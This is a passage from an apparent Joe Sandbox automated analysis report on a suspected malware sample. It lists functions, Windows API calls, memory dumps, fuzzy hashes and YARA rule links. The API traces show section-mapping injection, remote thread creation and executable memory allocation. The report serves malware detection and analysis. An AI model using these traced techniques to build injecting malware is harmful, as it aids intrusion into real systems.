Opcode Fuzzy Hash: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
Instruction Fuzzy Hash: CB315E18518780CAE301DB79FC257823F6AAB75744F04D1ACD54C8B3B1D7BA1618E36E

Function 006D054E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006D0576
Module32First.KERNEL32(00000000,00000224), ref: 006D0596

Memory Dump Source

Source File: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6cd000_4470.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: cb40f35b746772c24be4edbcd4519ba32e704b6d7ec32b48478d4cafd79e7b74
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: AAF096319007106FE7203BF5A98DFAE76EDAF49724F10052AFA52D16C0DB70ED454E61

Function 02160E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02160223,?,?), ref: 02160E19
SetErrorMode.KERNELBASE(00000000,?,?,02160223,?,?), ref: 02160E1E

Memory Dump Source

Source File: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2160000_4470.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: e9c0ddff7ad8c06008852dff5cd4673f15b5d7d0f17db3ceebe3952d7cf3b5ad
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 53D0123154512877D7002AD4DC0DBDD7B1CDF09B66F108011FB0DD9080C770954046E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 006D020D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006D025E

Memory Dump Source

Source File: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6cd000_4470.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 2a0c500e09f998ada6447afdbf67cedf628d77ecd398b0aab8bbad47da5027e3
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A4113C79A40208EFDB01DF98C989E98BFF5AF08350F058095F9489B362D371EA50DF80

Function 00418650 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00513D6C,00418CE2), ref: 00418658

Memory Dump Source

Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_4470.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10

Non-executed Functions

Function 00418860 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00418874
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418886
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 004188DE
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0

Strings

-, xrefs: 004188FD

Memory Dump Source

Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_4470.jbxd

Similarity

API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
String ID: -
API String ID: 2332831159-2547889144
Opcode ID: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
Instruction ID: 0644f3d8bb0354bad6e2d065abd9d00753a10c55890622e6c15ca0d418187488
Opcode Fuzzy Hash: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
Instruction Fuzzy Hash: 3D11FE31A84304B7E7217BA4AD45BEE3F74AB09B11F51413DFB046A1C1CEB41D81975E

Function 00418896 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 004188DE
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0

Strings

-, xrefs: 004188FD

Memory Dump Source

Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_4470.jbxd

Similarity

API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
String ID: -
API String ID: 1414951042-2547889144
Opcode ID: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
Instruction ID: 7ad43abfb1ccff6a3ed9ab509b84ed7d9337a427fc65eba8a3385d97bacaee92
Opcode Fuzzy Hash: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
Instruction Fuzzy Hash: 96F0C231A84305ABDB219FA4EC567D97B70FB08725F614268F6086E1C0CAB41A42DB8A

Function 00418920 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(0041A398,?,00000000), ref: 00418957
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418972
HeapDestroy.KERNEL32(00000000), ref: 00418991
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004189A0

Memory Dump Source

Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_4470.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 6106f044a8ab3b7a482ce23ec0a1203b538232170fb1ceb5eae964420bede924
Instruction ID: f860d7c9f62419cabb77a296b47f4597be1339bc88c022d8ab911ec82e630865
Opcode Fuzzy Hash: 6106f044a8ab3b7a482ce23ec0a1203b538232170fb1ceb5eae964420bede924
Instruction Fuzzy Hash: A20188B4940208DFD720EB64ED55BE97778D718345F40407BEA05A7290DE345E85CF9E

Analysis Process: fihcrfbPID: 8068, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	29.3%
Signature Coverage:	0%
Total number of Nodes:	164
Total number of Limit Nodes:	7

Executed Functions

Function 004189C0 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 310
libraryfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418ADB
SetFocus.USER32(00000000), ref: 00418AE4
ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418AEF
FindAtomW.KERNEL32(00000000), ref: 00418AF6
SearchPathA.KERNEL32(0041A3E4,0041A3CC,0041A3B8,00000000,?,?), ref: 00418B1A
GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418B22
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418B3A
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418B61
CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418B6D
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418B83
GetEnvironmentStringsW.KERNEL32 ref: 00418B89
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418BCE
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418BDD
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418BE6
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BFB
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418C0C
SetCommMask.KERNELBASE(00000000,00000000), ref: 00418C35
GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418C4B
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418C7A
GetComputerNameW.KERNEL32(?,?), ref: 00418C8E
GetConsoleAliasExesLengthW.KERNEL32 ref: 00418C94
GetBinaryType.KERNEL32(0041A3F0,?), ref: 00418CA6
PurgeComm.KERNEL32(00000000,00000000), ref: 00418CAE
LoadLibraryA.KERNELBASE(0041A410), ref: 00418D22
MoveFileW.KERNEL32(00000000,00000000), ref: 00418D57
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D7E

Strings

}$, xrefs: 00418D85
k`, xrefs: 00418D5D

Memory Dump Source

Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd

Similarity

API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
String ID: k`$}$
API String ID: 87775671-956986773
Opcode ID: 48971c36b23ff85eb0f2744f6ec5e1cb4899774be3d2319cfe000faf9f975359
Instruction ID: 14be8ff56781b1d00f5d5c610e1110d06a152b2d889af403ee48b93a4b1bf100
Opcode Fuzzy Hash: 48971c36b23ff85eb0f2744f6ec5e1cb4899774be3d2319cfe000faf9f975359
Instruction Fuzzy Hash: EDB1C671901224ABCB209B65EC54BDF7B79EF59310F00806EF609A31A1DB385E84CFAD

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 006C003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006C024D

Strings

cess, xrefs: 006C018D
kernel32.dll, xrefs: 006C008F, 006C0095

Memory Dump Source

Source File: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c0000_fihcrfb.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: a16ad12f4b347be2b0c0f4aa935509a1366d3d88948981c0025655a100cedf30
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: F4525874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

Function 00418680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00513D70), ref: 0041875F
GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041879C
VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004187BB

Strings

, xrefs: 004186C5

Memory Dump Source

Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
Instruction ID: 2155bd9b31e59c350c635bb378a89ddac8c1e1b9edbf8731bf03073443d6ecc1
Opcode Fuzzy Hash: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
Instruction Fuzzy Hash: CB315E18518780CAE301DB79FC257823F6AAB75744F04D1ACD54C8B3B1D7BA1618E36E

Function 00710836 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0071085E
Module32First.KERNEL32(00000000,00000224), ref: 0071087E

Memory Dump Source

Source File: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70d000_fihcrfb.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d202ffc1bdfc86c7b4dbbd08686fccad44d69029437d9579aa45105526ac0560
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 5DF06231100714AFD7203BBDA88DAAB76E8AF49725F100529E642914C0DAB8E8C546E1

Function 006C0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,006C0223,?,?), ref: 006C0E19
SetErrorMode.KERNELBASE(00000000,?,?,006C0223,?,?), ref: 006C0E1E

Memory Dump Source

Source File: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c0000_fihcrfb.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4685c5a770edda50dbe0b2dc837f552568978304271461a35dbeccacd63f79b3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 97D01231145129B7D7003A94DC0DBDD7B1CDF09B62F008411FB0DD9180C770994046E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
